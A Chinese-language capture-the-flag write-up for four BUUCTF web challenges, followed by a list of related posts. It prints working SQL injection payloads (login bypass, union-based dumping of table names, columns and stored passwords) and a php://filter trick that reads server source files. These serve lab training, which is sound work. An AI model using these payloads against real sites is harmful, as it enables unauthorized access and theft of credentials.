buuctf web wp
文章目录
- [极客大挑战 2019]EasySQL
- [极客大挑战 2019]Havefun
- [极客大挑战 2019]Secret File
- [极客大挑战 2019]LoveSQL
[极客大挑战 2019]EasySQL
打开后是一个登录框,直接尝试万能密码
(用户名:1’ or 1=1 # 密码:随便输)
登录得到flag
这里的万能密码是为什么呢?
数据库中的查询语句:
select id from users where username = '' or 1=1-- and password = '456'
又 这里呢1=1永远为真,后面 and password = ‘456’被注释掉了。数据库不需要考虑,这里我们就跳过了验证。
绕圈子的写法
尝试输入用户名和密码,在用户名和密码处输入正常数字时显示NO,Wrong username password!!! 但是在用户名和密码处输入数字加上’时页面报错,尝试换成数字+)没有报错,所以判断存在sql注入并且闭合符号为’
接着查询字段数
http://0c01d356-491f-4f75-be44-ec8e20c6661c.node4.buuoj.cn:81/check.php?``username=1' order by 4%23&password=1
查询注入点
http://0c01d356-491f-4f75-be44-ec8e20c6661c.node4.buuoj.cn:81/check.php?username=1' union select 1,2,3%23&password=1
这时已经爆出了flag
[极客大挑战 2019]Havefun
打开后一个挺好玩的网站,查看源代码,拉到底发现是一个简单的get传值,
直接输入?cat=dog
可以得到flag
[极客大挑战 2019]Secret File
是个网站,先查看源代码,发现有一个可以点的网站,点开进入
按钮点了之后会迅速返回到这里
尝试抓包,看看有没有有用的信息,抓包发现有一个文件,访问
访问后又发现一个提示
访问flag.php发现什么也没有,这里思路断了不知道咋那么写了,查看别人的wp发现要用到filter伪协议没见过,去百度搜了下,这里用到的是base过滤器:
base64的编码转换操作,例如:
file_get_contents("php://filter/read=convert.base64-encode/resource=data://text/plain,m1sn0w");
Quoted-printable
可译为可打印字符引用编码,可以理解为将一些不可打印的ASCII字符进行一个编码转换,转换成=后面跟两个十六进制数,例如:
file_get_contents("php://filter/read=convert.quoted-printable-encode/resource=data://text/plain,m1sn0w".chr(12));输出为m1sn0w=0C
摘自大佬博客:https://cxymm.net/article/gental_z/122303393
所以这里要构造语句
?file=php://filter/convert.base64-encode/resource=flag.php
可以得到一长串base密码,找个网站解密可以得到flag
[极客大挑战 2019]LoveSQL
打开后发现是一个登录框,尝试万能密码
可以得到这个
尝试登陆,果然登不上
那就sql注入,查询字符段
?username=1' order by 3%23&passward=1
?username=1' order by 4%23&passward=1
4时报错,字段数为3
然后查询注入点
?username=1' union select 1,2,3%23&password=1
得到回显点位为2和3,查询当前数据库名及版本:
?username=1' union select 1,database(),version()%23&password=1
然后爆表
?username=1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database()%23&password=1
爆字段,先爆l0ve1ysq1这个表
?username=1' union select 1,2,group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='l0ve1ysq1'%23&password=1
最后爆数据,得到flag
?username=1' union select 1,2,group_concat(id,username,password) from l0ve1ysq1%23&password=1
buuctf web wp相关推荐
- Buuctf -web wp汇总(一)
Buuctf -web wp汇总(一):链接 Buuctf -web wp汇总(二):链接 持续更新ing~ BuuCTF平台 文章目录 BuuCTF平台 [极客大挑战 2019]EasySQL [极 ...
- Buuctf -web wp汇总(三)
Buuctf -web wp汇总(一):链接 Buuctf -web wp汇总(二):链接 Buuctf -web wp汇总(三):链接 文章目录 [WUSTCTF2020]朴实无华 [WUSTCTF ...
- 纵横杯2020 web wp
title: 纵横杯2020 web wp date: 2020-12-26 18:19:03 tags: CTF categories: 比赛 link:https://yq1ng.github.i ...
- BUUCTF WEB [BJDCTF2020]ZJCTF,不过如此
BUUCTF WEB [BJDCTF2020]ZJCTF,不过如此 进入环境后得到源码 <?phperror_reporting(0); $text = $_GET["text&quo ...
- BUUCTF Web 极客大挑战 2019 EasySQL
BUUCTF Web 极客大挑战 2019 EasySQL 文章目录 BUUCTF Web 极客大挑战 2019 EasySQL 1,输入万能密码: 2,输入万能账号 首先有点常识: 正常SQL语句这 ...
- BUUCTF WEB [BSidesCF 2020]Had a bad day
BUUCTF WEB [BSidesCF 2020]Had a bad day index.php?category=woofers' 报错 Warning: include(woofers'.php ...
- BUUCTF WEB [BJDCTF2020]The mystery of ip
BUUCTF WEB [BJDCTF2020]The mystery of ip 在hint.php中找到一句注释 <!-- Do you know why i know your ip? -- ...
- BUUCTF WEB [极客大挑战 2019]LoveSQL
BUUCTF WEB [极客大挑战 2019]LoveSQL 进入靶机后尝试万能密码登录 admin 123' or '1'='1 获得flag Login Success! Hello admin! ...
- ISCC2021 Web WP
目录 练武 ISCC客服冲冲冲(一) 这是啥 正则匹配最后的倔强. 登录 which is the true iscc ISCC客服一号冲冲冲(二) lovely ssti 擂台 tornado ea ...
- BUUCTF web(三)
[HCTF 2018]admin 随便注册了一个账号,登陆进去在change password界面源码找到了 Flask是一个使用 Python 编写的轻量级 Web 应用框架.其 WSGI 工具箱采 ...
最新文章
- 当我们在讨论奢侈品行业时,人工智能可以做什么?
- android 窗口缩放,Android界面整体缩放
- 转载:Linux查看设置系统时区
- asp.net 命令行工具初步了解
- Tornado--基于H5图片的上传
- 10个python使用技巧
- 传说之下地图素材_文旅黄陵——轩辕黄帝传说故事(十一) 杜康酿酒的传说...
- Boost:人口 bimap的测试程序
- 设计模式笔记 18. Observer 观察者模式(行为型模式)
- 程序异常退出后,托盘残留图标清理方法(C#)
- 【每日SQL打卡】​​​​​​​​​​​​​​​DAY 9丨有趣的电影【难度简单】
- 【LeetCode笔记】剑指 Offer 10-I. 斐波那契数列 (Java、递归、动态规划)
- Spring Boot文档阅读笔记=Caching Data with Spring
- 关于spring mvc时间类型绑定失败解决方法
- [转载]多维数组与Json格式的转化
- 使用STS创建Spring boot project报错:Project build error: Non-resolvable parent POM for
- php.ini 设置内存,php.ini怎么进行内存设置
- 08. 旋转数组的最小数字(C++版本)
- 微信emoji表情json文档
- Blazor使用PDFObject预览pdf文件